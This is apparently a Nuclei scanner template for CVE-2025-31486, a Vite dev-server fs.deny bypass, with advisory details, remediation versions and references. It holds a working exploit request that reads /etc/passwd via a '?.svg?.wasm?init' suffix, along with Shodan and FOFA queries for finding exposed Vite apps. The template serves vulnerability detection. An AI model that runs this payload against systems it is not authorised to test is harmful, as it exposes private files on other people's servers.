id: CVE-2025-31486

info:
  name: Vite server.fs.deny Bypass - Local File Inclusion
  author: wn147
  severity: medium
  description: |
    Vite is a frontend tooling framework for javascript. The contents of arbitrary files can be returned to the browser. By adding ?.svg with ?.wasm?init or with sec-fetch-dest- script header, the server.fs.deny restriction was able to bypass. This bypass is only possible if the file is smaller than build.assetsInlineLimit (default- 4kB) and when using Vite 6.0+. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.
  impact: |
    Attackers can bypass server.fs.deny restrictions to read arbitrary files smaller than 4kB when the Vite dev server is exposed to the network, potentially exposing sensitive configuration data.
  remediation: |
    Update Vite to version 4.5.12, 5.4.17, 6.0.14, 6.1.4, 6.2.5 or later.
  reference:
    - https://github.com/advisories/GHSA-xcj6-pq6g-qj4x
    - https://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290
    - https://github.com/vitejs/vite/commit/62d7e81ee189d65899bb65f3263ddbd85247b647
    - https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x
    - https://nvd.nist.gov/vuln/detail/CVE-2025-31486
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-31486
    cwe-id: CWE-200
    epss-score: 0.3506
    epss-percentile: 0.98229
  metadata:
    verified: true
    max-requests: 1
    shodan-query: title:"Vite App"
    fofa-query: title="Vite App"
  tags: cve,cve2025,vite,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/etc/passwd?.svg?.wasm?init"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "import initWasm"
          - "sourceMappingURL="
        condition: and

      - type: word
        part: body
        words:
          - "/@fs/etc/passwd?.svg"
        negative: true

      - type: word
        part: content_type
        words:
          - "text/javascript"

      - type: status
        status:
          - 200
# digest: 490a0046304402201818e4660190dfb9e4afa0f6149b6d633061b4567583e8d66d7ca4533624f4e3022008c3759602ab65610efe693be581fc0d6b71eca07edb9ac59b7fb33abec5b042:922c64590222798bb761d5b6d8e72950